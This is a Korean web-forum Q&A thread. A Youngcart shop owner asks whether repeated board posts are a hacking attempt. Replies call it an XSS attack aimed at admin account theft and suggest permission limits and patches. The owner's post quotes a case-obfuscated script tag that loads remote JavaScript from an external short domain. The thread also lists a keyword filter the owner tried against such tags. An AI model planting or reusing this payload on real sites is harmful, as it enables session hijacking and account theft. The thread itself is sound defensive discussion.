해킹시도일까요? 차단할수있는방법 알수있을까요??

해킹시도일까요? 차단할수있는방법 알수있을까요??

QA

해킹시도일까요? 차단할수있는방법 알수있을까요??

답변 2

본문

저희 홈페이지 구매후기,Q&A게시판에

 

 <sCRiPt sRC=//0x.ax/dflh></sCrIpT> 이런글이 요즘들어

 

자주 등록되는데 회원가입을 하긴하는데 대포폰인지 연결도되지않고

 

나이도 엄청많은사람 명의로 저런글 도배합니다

 

썼다가 바로지우고 그러던데 혹시 해킹시도인가요?

 

해결방법이있나요? html태그 못하게 막아라는글고 본것같은데

 

영카트자체적으로 어느정도 보안이 되어있나요?ㅠ

이 질문에 댓글 쓰기 :

답변 2

중국발 xss 공격 시도입니다.

보통 관리자 계정 탈취가 목적인데

 

해당 공격은 단일패턴이 아니라서 영카트에서도

꾸준하게 취약점 업데이트가 이루어지고 있습니다.

 

우선 html 글쓰기 권한을 일반회원이 아닌 등급으로 올려주세요.

그것만해도 반은 막을수 있습니다.

 

그리고 영카트 보안패치는 가급적 올라오는대로 해주는게 좋습니다.

현재HTML 쓰기권한은 관리자만 가능하게 10으로 설정되어있고

혹시몰라 단어필터링에도 sCRiPT,sRC,sCRiPt sRC,/sCrIpT,<,>,/,<,>

입력해뒀는데

게시판에 sCRiPT 입력하면 입력이안되는데 <sCRiPT 이런식으로 시작해버리면

<는 필터링이안되어 글이 등록되는데 <자체를 못쓰게할순없을까요

답변을 작성하시기 전에 로그인 해주세요.
QA 내용 검색
질문등록
전체 2,662
© SIRSOFT
현재 페이지 제일 처음으로